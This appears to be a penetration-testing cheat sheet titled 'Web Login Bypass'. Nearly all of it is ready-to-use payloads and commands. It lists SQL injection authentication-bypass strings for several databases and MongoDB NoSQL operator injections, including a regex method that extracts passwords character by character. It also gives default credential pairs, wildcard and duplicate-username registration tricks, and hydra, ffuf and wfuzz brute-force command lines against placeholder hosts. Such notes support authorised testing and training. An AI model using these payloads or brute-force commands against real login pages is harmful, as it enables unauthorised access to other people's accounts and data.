Exploit Notes

Web Login Bypass

Last modified: 2023-03-20

SQL Injection Web

SQL Injections

admin' or '1'='1

Microsoft, Oracle, PostgreSQL

admin'--
admin' or 1=1--
admin' or '1'='1'--

admin}" or 1=1--

MySQL

admin'-- -
admin'#

admin' or 1=1#
admin' or 1=1-- -

admin' or '1'='1'-- -
admin' or '1'='1'#

admin}" or 1=1-- -

NoSQL Injection

Mongo

admin' || 1==1//
admin' || 1==1%00
admin' || '1==1
admin' || '1'=='1
  • Operators

    # $ne: Not equal
    username[$ne]=xyz&password[$ne]=xyz
    
    # $regex: Regular expressions
    username[$regex]=.*&password[$regex]=.*
    username[$regex]=^xyz&password[$regex]=^xyz
    username[$regex]=^a.*$&password[$ne]=xyz
    username[$regex]=.{6}&password[$ne]=xyz
    username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values
    
    # $exists: Exists in the database
    username[$exists]=true&password[$exists]=true
    
    # $nin: Not include
    username[$nin][admin]=admin&password[$ne]=xyz
    # If we found the "admin" exists, we can exclude "admin" by specifying $nin operator.
    username[$nin][]=admin&password[$ne]=xyz
    # If more users are found, we can exclude the user.
    username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz
    
    # $gt: Greater than
    username[$gt]=s&password[$gt]=s
    # $lt: Lower than
    username[$lt]=s&password[$lt]=s
    
    # Combinations
    username[$ne]=xyz&password[$regex]=.*
    username[$exists]=true&password[$ne]=xyz
    username[$ne]=xyz&password[$exists]=true
    username[$regex]=.*&password[$ne]=xyz
    username[$ne]=xyz&password[$regex]=.*
    username[$regex]=.{6}&password[$ne]=xyz
    

    After finding usernames, we can also obtain the passwords using the “$regex” operator as the following example.

    # Check if the password length is 7 characters.
    username=admin&password[$regex]=^.{7}$
    # If not, change 7 to 6 (or 8 or something number).
    username=admin&password[$regex]=^.{6}$
    # If the number of characters turns out to be 6, brute force the character one by one.
    username=admin&password[$regex]=^a.....$
    username=admin&password[$regex]=^s.....$
    username=admin&password[$regex]=^se....$
    username=admin&password[$regex]=^sec...$
    
  • Operators in Json

    If the above payloads not working, try changing to a json format.
    We also need to change the value of the Content-Type to “application/json” in the HTTP header.

    Content-Type: application/json
    
    {"username": { "$ne": "xyz" }, "password": { "$ne": "xyz" }}
    

Default Credentials

admin:admin
admin:password
admin:password1
admin:password123
administrator:password
administrator:password1
administrator:password123

# phpIPAM
admin:ipamadmin
Admin:ipamadmin

# PHPMyAdmin
root:(null)
root:password

Wildcard Brute Force

If it is allowed to login with wildcard (*), you may be able to find the username/password with brute force.

username = *
password = *

For example, in Turbo Intruder (Burp Suite), login attempt with alpha numeric characters one by one.

username=%s*&password=*
# or
username=*&password=%s*

My favorite wordlist for it is the seclists:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case-extra.txt


Registration as Existing User

If we know existing users in the target website, we might be able to register the same username as the existing user. For example, assume we know “admin” user exists in the website.

Try to register as the username such as below.

admin
admin%00
# Put a space before the username
 admin

If we can register the same username, we can login and see the information about the user.


Brute Force Credentials

Before brute forcing, we need wordlists used for it.

  • Rockyou

  • SecLists

  • CeWL

    Generate the custom wordlist from the target web page.

    cewl https://vulnerable.com > scraped_words.txt
    

Ffuf

# -fc: Filter HTTP status code
ffuf -w passwords -X POST -d "username=admin&password=FUZZ" -u http://vulnerable.com/login -fc 401

# Basic Auth
ffuf -u https://admin:FUZZ@example.com/ -w wordlist.txt -fc 401

Hydra

# Cracking username
hydra -L usernames.txt -p password vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
# Cracking password
hydra -l username -P passwords.txt vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid password"

# HTTPS (https-post-form)
hydra -L usernames.txt -P passwords.txt vulnerable.com https-post-form "/login:username=^USER^&password=^PASS^:Username or password is incorrect"


# Cracking the Authorization or WWW-Authenticate in the request header.
hydra -L usernames.txt -P passwords.txt <target-ip> http-get

Wfuzz

# Cracking username
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" https://example.com/login
# Cracking password
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" https://example.com/login

# Range: 00-99 -> "password00", "password01", ..., "password99"
# -t: N threads
# -s: N seconds per request
wfuzz -z range,00-99 -d "username=admin&password=passwordFUZZ&submit=Submit" -X POST -u https://example.com/login -t 1 -s 20

# -- Options --------------------------------------------------------------------------------------------

# --hc: Hide the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --hc 302 http://example.com/login
# --hh: Hide the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --hh 783 http://example.com/login

# --sc: Show the specific statuc code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --sc 302 http://example.com/login
# --sh: Show the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --sh 1214 http://example.com/login

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.